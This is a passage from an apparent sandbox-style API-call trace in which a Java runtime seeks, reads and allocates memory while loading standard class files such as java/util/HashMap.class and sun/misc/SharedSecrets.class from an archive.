liDistanceToMove=0x341ccdc, lpNewFilePointer=0x208d0e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d0e0*=54643932) returned 1 [0092.814] ReadFile (in: hFile=0x134, lpBuffer=0x20fecf0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d0b0, lpOverlapped=0x0 | out: lpBuffer=0x20fecf0*, lpNumberOfBytesRead=0x208d0b0*=0xa0, lpOverlapped=0x0) returned 1 [0092.814] malloc (_Size=0x39) returned 0x121d93f0 [0092.814] free (_Block=0x20fecf0) [0092.814] strlen (_Str="java/util/Collections$UnmodifiableRandomAccessList.class") returned 0x38 [0092.815] strcpy (in: _Dest=0x208d260, _Source="java/util/Collections$UnmodifiableRandomAccessList.class" | out: _Dest="java/util/Collections$UnmodifiableRandomAccessList.class") returned="java/util/Collections$UnmodifiableRandomAccessList.class" [0092.815] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31b06c3, lpNewFilePointer=0x208cce0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cce0*=52102851) returned 1 [0092.815] ReadFile (in: hFile=0x134, lpBuffer=0x208cd30, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208ccb0, lpOverlapped=0x0 | out: lpBuffer=0x208cd30*, lpNumberOfBytesRead=0x208ccb0*=0x1e, lpOverlapped=0x0) returned 1 [0092.815] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31b0719, lpNewFilePointer=0x208cd40, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd40*=52102937) returned 1 [0092.815] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x339, lpNumberOfBytesRead=0x208cd10, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208cd10*=0x339, lpOverlapped=0x0) returned 1 [0092.815] free (_Block=0x121d7e20) [0092.815] free (_Block=0x121d9350) [0092.818] malloc (_Size=0x48) returned 0x121d9530 [0092.818] malloc (_Size=0xa0) returned 0x20fecf0 [0092.818] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341cc82, lpNewFilePointer=0x208c6a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c6a0*=54643842) returned 1 [0092.818] ReadFile (in: hFile=0x134, lpBuffer=0x20fecf0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c670, lpOverlapped=0x0 | out: lpBuffer=0x20fecf0*, lpNumberOfBytesRead=0x208c670*=0xa0, lpOverlapped=0x0) returned 1 [0092.818] malloc (_Size=0x2d) returned 0x121da370 [0092.818] free (_Block=0x20fecf0) [0092.819] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31afccf, lpNewFilePointer=0x208c2a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c2a0*=52100303) returned 1 [0092.819] ReadFile (in: hFile=0x134, lpBuffer=0x208c2f0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c270, lpOverlapped=0x0 | out: lpBuffer=0x208c2f0*, lpNumberOfBytesRead=0x208c270*=0x1e, lpOverlapped=0x0) returned 1 [0092.882] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31afd19, lpNewFilePointer=0x208c300, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c300*=52100377) returned 1 [0092.883] ReadFile (in: hFile=0x134, lpBuffer=0x2102f30, nNumberOfBytesToRead=0x9aa, lpNumberOfBytesRead=0x208c2d0, lpOverlapped=0x0 | out: lpBuffer=0x2102f30*, lpNumberOfBytesRead=0x208c2d0*=0x9aa, lpOverlapped=0x0) returned 1 [0092.883] free (_Block=0x121d93f0) [0092.883] free (_Block=0x121d9170) [0092.886] malloc (_Size=0x48) returned 0x121d9ad0 [0092.886] malloc (_Size=0xa0) returned 0x20fecf0 [0092.886] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341cc22, lpNewFilePointer=0x208bc60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bc60*=54643746) returned 1 [0092.886] ReadFile (in: hFile=0x134, lpBuffer=0x20fecf0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208bc30, lpOverlapped=0x0 | out: lpBuffer=0x20fecf0*, lpNumberOfBytesRead=0x208bc30*=0xa0, lpOverlapped=0x0) returned 1 [0092.886] malloc (_Size=0x33) returned 0x121dadf0 [0092.886] free (_Block=0x20fecf0) [0092.886] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31af27c, lpNewFilePointer=0x208b860, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b860*=52097660) returned 1 [0092.887] ReadFile (in: hFile=0x134, lpBuffer=0x208b8b0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b830, lpOverlapped=0x0 | out: lpBuffer=0x208b8b0*, lpNumberOfBytesRead=0x208b830*=0x1e, lpOverlapped=0x0) returned 1 [0092.904] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31af2cc, lpNewFilePointer=0x208b8c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b8c0*=52097740) returned 1 [0092.904] ReadFile (in: hFile=0x134, lpBuffer=0x2103ab0, nNumberOfBytesToRead=0xa03, lpNumberOfBytesRead=0x208b890, lpOverlapped=0x0 | out: lpBuffer=0x2103ab0*, lpNumberOfBytesRead=0x208b890*=0xa03, lpOverlapped=0x0) returned 1 [0092.911] strlen (_Str="sun/misc/Cleaner") returned 0x10 [0092.916] strlen (_Str="java/lang/ref/ReferenceQueue$Null.class") returned 0x27 [0092.916] malloc (_Size=0x48) returned 0x121d9580 [0092.916] malloc (_Size=0xa0) returned 0x20fecf0 [0092.916] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341d644, lpNewFilePointer=0x208ce40, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ce40*=54646340) returned 1 [0092.916] ReadFile (in: hFile=0x134, lpBuffer=0x20fecf0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208ce10, lpOverlapped=0x0 | out: lpBuffer=0x20fecf0*, lpNumberOfBytesRead=0x208ce10*=0xa0, lpOverlapped=0x0) returned 1 [0092.916] malloc (_Size=0x28) returned 0x121d8150 [0092.917] free (_Block=0x20fecf0) [0092.917] strlen (_Str="java/lang/ref/ReferenceQueue$Null.class") returned 0x27 [0092.917] strcpy (in: _Dest=0x208cfc0, _Source="java/lang/ref/ReferenceQueue$Null.class" | out: _Dest="java/lang/ref/ReferenceQueue$Null.class") returned="java/lang/ref/ReferenceQueue$Null.class" [0092.917] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31c8c43, lpNewFilePointer=0x208ca40, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ca40*=52202563) returned 1 [0092.918] ReadFile (in: hFile=0x134, lpBuffer=0x208ca90, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208ca10, lpOverlapped=0x0 | out: lpBuffer=0x208ca90*, lpNumberOfBytesRead=0x208ca10*=0x1e, lpOverlapped=0x0) returned 1 [0092.918] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31c8c88, lpNewFilePointer=0x208caa0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208caa0*=52202632) returned 1 [0092.918] ReadFile (in: hFile=0x134, lpBuffer=0x20fe9b0, nNumberOfBytesToRead=0x1fe, lpNumberOfBytesRead=0x208ca70, lpOverlapped=0x0 | out: lpBuffer=0x20fe9b0*, lpNumberOfBytesRead=0x208ca70*=0x1fe, lpOverlapped=0x0) returned 1 [0092.918] free (_Block=0x121dadf0) [0092.919] free (_Block=0x121d9ad0) [0092.927] strlen (_Str="java/lang/ref/ReferenceQueue$Lock.class") returned 0x27 [0092.927] malloc (_Size=0x48) returned 0x121d9030 [0092.927] malloc (_Size=0xa0) returned 0x20fecf0 [0092.927] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341d5ef, lpNewFilePointer=0x208cd20, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd20*=54646255) returned 1 [0092.927] ReadFile (in: hFile=0x134, lpBuffer=0x20fecf0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208ccf0, lpOverlapped=0x0 | out: lpBuffer=0x20fecf0*, lpNumberOfBytesRead=0x208ccf0*=0xa0, lpOverlapped=0x0) returned 1 [0092.927] malloc (_Size=0x28) returned 0x121d7a30 [0092.928] free (_Block=0x20fecf0) [0092.928] strlen (_Str="java/lang/ref/ReferenceQueue$Lock.class") returned 0x27 [0092.928] strcpy (in: _Dest=0x208cea0, _Source="java/lang/ref/ReferenceQueue$Lock.class" | out: _Dest="java/lang/ref/ReferenceQueue$Lock.class") returned="java/lang/ref/ReferenceQueue$Lock.class" [0092.928] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31c8aac, lpNewFilePointer=0x208c920, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c920*=52202156) returned 1 [0092.928] ReadFile (in: hFile=0x134, lpBuffer=0x208c970, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c8f0, lpOverlapped=0x0 | out: lpBuffer=0x208c970*, lpNumberOfBytesRead=0x208c8f0*=0x1e, lpOverlapped=0x0) returned 1 [0092.928] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31c8af1, lpNewFilePointer=0x208c980, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c980*=52202225) returned 1 [0092.928] ReadFile (in: hFile=0x134, lpBuffer=0x20fe9b0, nNumberOfBytesToRead=0x152, lpNumberOfBytesRead=0x208c950, lpOverlapped=0x0 | out: lpBuffer=0x20fe9b0*, lpNumberOfBytesRead=0x208c950*=0x152, lpOverlapped=0x0) returned 1 [0092.929] free (_Block=0x121d8150) [0092.929] free (_Block=0x121d9580) [0092.946] strlen (_Str="java/lang/ref/Reference$1.class") returned 0x1f [0092.946] malloc (_Size=0x48) returned 0x121d9530 [0092.946] malloc (_Size=0xa0) returned 0x121e2900 [0092.946] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33280e3, lpNewFilePointer=0x208e2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e2e0*=53641443) returned 1 [0092.946] ReadFile (in: hFile=0x134, lpBuffer=0x121e2900, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e2b0, lpOverlapped=0x0 | out: lpBuffer=0x121e2900*, lpNumberOfBytesRead=0x208e2b0*=0xa0, lpOverlapped=0x0) returned 1 [0092.952] malloc (_Size=0x20) returned 0x121d7e80 [0092.953] free (_Block=0x121e2900) [0092.953] strlen (_Str="java/lang/ref/Reference$1.class") returned 0x1f [0092.953] strcpy (in: _Dest=0x208e460, _Source="java/lang/ref/Reference$1.class" | out: _Dest="java/lang/ref/Reference$1.class") returned="java/lang/ref/Reference$1.class" [0092.953] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x16de020, lpNewFilePointer=0x208dee0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dee0*=23978016) returned 1 [0092.953] ReadFile (in: hFile=0x134, lpBuffer=0x208df30, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208deb0, lpOverlapped=0x0 | out: lpBuffer=0x208df30*, lpNumberOfBytesRead=0x208deb0*=0x1e, lpOverlapped=0x0) returned 1 [0093.130] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x16de05d, lpNewFilePointer=0x208df40, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208df40*=23978077) returned 1 [0093.130] ReadFile (in: hFile=0x134, lpBuffer=0x20fe980, nNumberOfBytesToRead=0x16b, lpNumberOfBytesRead=0x208df10, lpOverlapped=0x0 | out: lpBuffer=0x20fe980*, lpNumberOfBytesRead=0x208df10*=0x16b, lpOverlapped=0x0) returned 1 [0093.131] free (_Block=0x121d7a30) [0093.131] free (_Block=0x121d9030) [0093.133] strlen (_Str="sun/misc/JavaLangRefAccess.class") returned 0x20 [0093.133] malloc (_Size=0x48) returned 0x121d9800 [0093.133] malloc (_Size=0xa0) returned 0x121e83e0 [0093.133] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33c1782, lpNewFilePointer=0x208d820, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d820*=54269826) returned 1 [0093.134] ReadFile (in: hFile=0x134, lpBuffer=0x121e83e0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d7f0, lpOverlapped=0x0 | out: lpBuffer=0x121e83e0*, lpNumberOfBytesRead=0x208d7f0*=0xa0, lpOverlapped=0x0) returned 1 [0093.134] malloc (_Size=0x21) returned 0x121d7b50 [0093.135] free (_Block=0x121e83e0) [0093.135] strlen (_Str="sun/misc/JavaLangRefAccess.class") returned 0x20 [0093.135] strcpy (in: _Dest=0x208d9a0, _Source="sun/misc/JavaLangRefAccess.class" | out: _Dest="sun/misc/JavaLangRefAccess.class") returned="sun/misc/JavaLangRefAccess.class" [0093.135] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x24cfd3a, lpNewFilePointer=0x208d420, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d420*=38599994) returned 1 [0093.135] ReadFile (in: hFile=0x134, lpBuffer=0x208d470, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d3f0, lpOverlapped=0x0 | out: lpBuffer=0x208d470*, lpNumberOfBytesRead=0x208d3f0*=0x1e, lpOverlapped=0x0) returned 1 [0093.351] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x24cfd78, lpNewFilePointer=0x208d480, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d480*=38600056) returned 1 [0093.352] ReadFile (in: hFile=0x134, lpBuffer=0x2102b80, nNumberOfBytesToRead=0x78, lpNumberOfBytesRead=0x208d450, lpOverlapped=0x0 | out: lpBuffer=0x2102b80*, lpNumberOfBytesRead=0x208d450*=0x78, lpOverlapped=0x0) returned 1 [0093.352] free (_Block=0x121d7e80) [0093.352] free (_Block=0x121d9530) [0093.360] strlen (_Str="sun/misc/SharedSecrets.class") returned 0x1c [0093.360] malloc (_Size=0x48) returned 0x121d98f0 [0093.360] malloc (_Size=0xa0) returned 0x121e83e0 [0093.360] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341ce32, lpNewFilePointer=0x208e020, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e020*=54644274) returned 1 [0093.360] ReadFile (in: hFile=0x134, lpBuffer=0x121e83e0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208dff0, lpOverlapped=0x0 | out: lpBuffer=0x121e83e0*, lpNumberOfBytesRead=0x208dff0*=0xa0, lpOverlapped=0x0) returned 1 [0093.363] malloc (_Size=0x1d) returned 0x121d7b20 [0093.363] free (_Block=0x121e83e0) [0093.364] strlen (_Str="sun/misc/SharedSecrets.class") returned 0x1c [0093.364] strcpy (in: _Dest=0x208e1a0, _Source="sun/misc/SharedSecrets.class" | out: _Dest="sun/misc/SharedSecrets.class") returned="sun/misc/SharedSecrets.class" [0093.364] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31b32f3, lpNewFilePointer=0x208dc20, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dc20*=52114163) returned 1 [0093.364] ReadFile (in: hFile=0x134, lpBuffer=0x208dc70, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208dbf0, lpOverlapped=0x0 | out: lpBuffer=0x208dc70*, lpNumberOfBytesRead=0x208dbf0*=0x1e, lpOverlapped=0x0) returned 1 [0093.365] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31b332d, lpNewFilePointer=0x208dc80, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dc80*=52114221) returned 1 [0093.365] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x1293, lpNumberOfBytesRead=0x208dc50, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208dc50*=0x1293, lpOverlapped=0x0) returned 1 [0093.367] free (_Block=0x121d7b50) [0093.367] free (_Block=0x121d9800) [0093.382] malloc (_Size=0x48) returned 0x121d9440 [0093.382] malloc (_Size=0xa0) returned 0x121e83e0 [0093.382] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341cde3, lpNewFilePointer=0x208d290, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d290*=54644195) returned 1 [0093.382] ReadFile (in: hFile=0x134, lpBuffer=0x121e83e0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d260, lpOverlapped=0x0 | out: lpBuffer=0x121e83e0*, lpNumberOfBytesRead=0x208d260*=0xa0, lpOverlapped=0x0) returned 1 [0093.383] malloc (_Size=0x22) returned 0x121d7b50 [0093.383] free (_Block=0x121e83e0) [0093.383] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31b318e, lpNewFilePointer=0x208ce90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ce90*=52113806) returned 1 [0093.383] ReadFile (in: hFile=0x134, lpBuffer=0x208cee0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208ce60, lpOverlapped=0x0 | out: lpBuffer=0x208cee0*, lpNumberOfBytesRead=0x208ce60*=0x1e, lpOverlapped=0x0) returned 1 [0093.383] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31b31cd, lpNewFilePointer=0x208cef0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cef0*=52113869) returned 1 [0093.384] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x126, lpNumberOfBytesRead=0x208cec0, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208cec0*=0x126, lpOverlapped=0x0) returned 1 [0093.384] malloc (_Size=0x48) returned 0x121d94e0 [0093.384] malloc (_Size=0xa0) returned 0x121e83e0 [0093.384] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341cd89, lpNewFilePointer=0x208c850, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c850*=54644105) returned 1 [0093.385] ReadFile (in: hFile=0x134, lpBuffer=0x121e83e0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c820, lpOverlapped=0x0 | out: lpBuffer=0x121e83e0*, lpNumberOfBytesRead=0x208c820*=0xa0, lpOverlapped=0x0) returned 1 [0093.385] malloc (_Size=0x2d) returned 0x121dadf0 [0093.385] free (_Block=0x121e83e0) [0093.385] strlen (_Str="java/lang/IncompatibleClassChangeError.class") returned 0x2c [0093.385] strcpy (in: _Dest=0x208c9d0, _Source="java/lang/IncompatibleClassChangeError.class" | out: _Dest="java/lang/IncompatibleClassChangeError.class") returned="java/lang/IncompatibleClassChangeError.class" [0093.386] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31b3023, lpNewFilePointer=0x208c450, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c450*=52113443) returned 1 [0093.386] ReadFile (in: hFile=0x134, lpBuffer=0x208c4a0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c420, lpOverlapped=0x0 | out: lpBuffer=0x208c4a0*, lpNumberOfBytesRead=0x208c420*=0x1e, lpOverlapped=0x0) returned 1 [0093.386] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31b306d, lpNewFilePointer=0x208c4b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c4b0*=52113517) returned 1 [0093.386] ReadFile (in: hFile=0x134, lpBuffer=0x2102d20, nNumberOfBytesToRead=0x121, lpNumberOfBytesRead=0x208c480, lpOverlapped=0x0 | out: lpBuffer=0x2102d20*, lpNumberOfBytesRead=0x208c480*=0x121, lpOverlapped=0x0) returned 1 [0093.386] free (_Block=0x121d7b50) [0093.386] free (_Block=0x121d9440) [0093.403] strlen (_Str="sun/reflect/Reflection.class") returned 0x1c [0093.404] malloc (_Size=0x48) returned 0x121d9710 [0093.404] malloc (_Size=0xa0) returned 0x121e83e0 [0093.404] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341cbd8, lpNewFilePointer=0x208cdb0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cdb0*=54643672) returned 1 [0093.404] ReadFile (in: hFile=0x134, lpBuffer=0x121e83e0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cd80, lpOverlapped=0x0 | out: lpBuffer=0x121e83e0*, lpNumberOfBytesRead=0x208cd80*=0xa0, lpOverlapped=0x0) returned 1 [0093.404] malloc (_Size=0x1d) returned 0x121d8120 [0093.404] free (_Block=0x121e83e0) [0093.405] strlen (_Str="sun/reflect/Reflection.class") returned 0x1c [0093.405] strcpy (in: _Dest=0x208cf30, _Source="sun/reflect/Reflection.class" | out: _Dest="sun/reflect/Reflection.class") returned="sun/reflect/Reflection.class" [0093.405] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31adba9, lpNewFilePointer=0x208c9b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c9b0*=52091817) returned 1 [0093.405] ReadFile (in: hFile=0x134, lpBuffer=0x208ca00, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c980, lpOverlapped=0x0 | out: lpBuffer=0x208ca00*, lpNumberOfBytesRead=0x208c980*=0x1e, lpOverlapped=0x0) returned 1 [0093.419] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31adbe3, lpNewFilePointer=0x208ca10, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ca10*=52091875) returned 1 [0093.419] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x1699, lpNumberOfBytesRead=0x208c9e0, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208c9e0*=0x1699, lpOverlapped=0x0) returned 1 [0093.425] free (_Block=0x121dadf0) [0093.426] free (_Block=0x121d94e0) [0093.444] strlen (_Str="java/util/HashMap.class") returned 0x17 [0093.444] malloc (_Size=0x48) returned 0x121d92b0 [0093.445] malloc (_Size=0xa0) returned 0x121e83e0 [0093.445] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341cb93, lpNewFilePointer=0x208c720, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c720*=54643603) returned 1 [0093.445] ReadFile (in: hFile=0x134, lpBuffer=0x121e83e0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c6f0, lpOverlapped=0x0 | out: lpBuffer=0x121e83e0*, lpNumberOfBytesRead=0x208c6f0*=0xa0, lpOverlapped=0x0) returned 1 [0093.445] malloc (_Size=0x18) returned 0x121d7440 [0093.445] free (_Block=0x121e83e0) [0093.445] strlen (_Str="java/util/HashMap.class") returned 0x17 [0093.446] strcpy (in: _Dest=0x208c8a0, _Source="java/util/HashMap.class" | out: _Dest="java/util/HashMap.class") returned="java/util/HashMap.class" [0093.446] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31a9fbb, lpNewFilePointer=0x208c320, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c320*=52076475) returned 1 [0093.446] ReadFile (in: hFile=0x134, lpBuffer=0x208c370, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c2f0, lpOverlapped=0x0 | out: lpBuffer=0x208c370*, lpNumberOfBytesRead=0x208c2f0*=0x1e, lpOverlapped=0x0) returned 1 [0093.462] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31a9ff0, lpNewFilePointer=0x208c380, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c380*=52076528) returned 1 [0093.462] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x3bb9, lpNumberOfBytesRead=0x208c350, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208c350*=0x3bb9, lpOverlapped=0x0) returned 1 [0093.474] free (_Block=0x121d8120) [0093.474] free (_Block=0x121d9710) [0093.492] malloc (_Size=0x48) returned 0x121d9da0 [0093.492] malloc (_Size=0xa0) returned 0x12208510 [0093.492] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341cb49, lpNewFilePointer=0x208c540, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c540*=54643529) returned 1 [0093.493] ReadFile (in: hFile=0x134, lpBuffer=0x12208510, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c510, lpOverlapped=0x0 | out: lpBuffer=0x12208510*, lpNumberOfBytesRead=0x208c510*=0xa0, lpOverlapped=0x0) returned 1 [0093.493] malloc (_Size=0x1d) returned 0x121d7a30 [0093.493] free (_Block=0x12208510) [0093.493] strlen (_Str="java/util/HashMap$Node.class") returned 0x1c [0093.494] strcpy (in: _Dest=0x208c6c0, _Source="java/util/HashMap$Node.class" | out: _Dest="java/util/HashMap$Node.class") returned="java/util/HashMap$Node.class" [0093.494] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31a9959, lpNewFilePointer=0x208c140, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c140*=52074841) returned 1 [0093.494] ReadFile (in: hFile=0x134, lpBuffer=0x208c190, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c110, lpOverlapped=0x0 | out: lpBuffer=0x208c190*, lpNumberOfBytesRead=0x208c110*=0x1e, lpOverlapped=0x0) returned 1 [0093.494] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31a9993, lpNewFilePointer=0x208c1a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c1a0*=52074899) returned 1 [0093.494] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x628, lpNumberOfBytesRead=0x208c170, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208c170*=0x628, lpOverlapped=0x0) returned 1 [0093.494] free (_Block=0x121d7440) [0093.494] free (_Block=0x121d92b0) [0093.497] strlen (_Str="java/util/Map$Entry.class") returned 0x19 [0093.497] malloc (_Size=0x48) returned 0x121d9c10 [0093.497] malloc (_Size=0xa0) returned 0x1220a520 [0093.497] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341d4c1, lpNewFilePointer=0x208ba80, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ba80*=54645953) returned 1 [0093.497] ReadFile (in: hFile=0x134, lpBuffer=0x1220a520, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208ba50, lpOverlapped=0x0 | out: lpBuffer=0x1220a520*, lpNumberOfBytesRead=0x208ba50*=0xa0, lpOverlapped=0x0) returned 1 [0093.497] malloc (_Size=0x1a) returned 0x121d7ee0 [0093.498] free (_Block=0x1220a520) [0093.498] strlen (_Str="java/util/Map$Entry.class") returned 0x19 [0093.498] strcpy (in: _Dest=0x208bc00, _Source="java/util/Map$Entry.class" | out: _Dest="java/util/Map$Entry.class") returned="java/util/Map$Entry.class" [0093.498] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31c5dfc, lpNewFilePointer=0x208b680, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b680*=52190716) returned 1 [0093.498] ReadFile (in: hFile=0x134, lpBuffer=0x208b6d0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b650, lpOverlapped=0x0 | out: lpBuffer=0x208b6d0*, lpNumberOfBytesRead=0x208b650*=0x1e, lpOverlapped=0x0) returned 1 [0093.524] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31c5e33, lpNewFilePointer=0x208b6e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b6e0*=52190771) returned 1 [0093.524] ReadFile (in: hFile=0x134, lpBuffer=0x21031f0, nNumberOfBytesToRead=0xe1c, lpNumberOfBytesRead=0x208b6b0, lpOverlapped=0x0 | out: lpBuffer=0x21031f0*, lpNumberOfBytesRead=0x208b6b0*=0xe1c, lpOverlapped=0x0) returned 1 [0093.541] free (_Block=0x121d7a30) [0093.541] free (_Block=0x121d9da0) [0093.570] strlen (_Str="sun/misc/VM.class") returned 0x11 [0093.570] malloc (_Size=0x48) returned 0x121d8fe0 [0093.570] malloc (_Size=0xa0) returned 0x1220a520 [0093.570] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341d555, lpNewFilePointer=0x208d690, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d690*=54646101) returned 1 [0093.570] ReadFile (in: hFile=0x134, lpBuffer=0x1220a520, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d660, lpOverlapped=0x0 | out: lpBuffer=0x1220a520*, lpNumberOfBytesRead=0x208d660*=0xa0, lpOverlapped=0x0) returned 1 [0093.570] malloc (_Size=0x12) returned 0x121d71c0 [0093.571] free (_Block=0x1220a520) [0093.571] strlen (_Str="sun/misc/VM.class") returned 0x11 [0093.571] strcpy (in: _Dest=0x208d810, _Source="sun/misc/VM.class" | out: _Dest="sun/misc/VM.class") returned="sun/misc/VM.class" [0093.571] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31c7366, lpNewFilePointer=0x208d290, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d290*=52196198) returned 1 [0093.571] ReadFile (in: hFile=0x134, lpBuffer=0x208d2e0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d260, lpOverlapped=0x0 | out: lpBuffer=0x208d2e0*, lpNumberOfBytesRead=0x208d260*=0x1e, lpOverlapped=0x0) returned 1 [0093.572] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31c7395, lpNewFilePointer=0x208d2f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d2f0*=52196245) returned 1 [0093.572] ReadFile 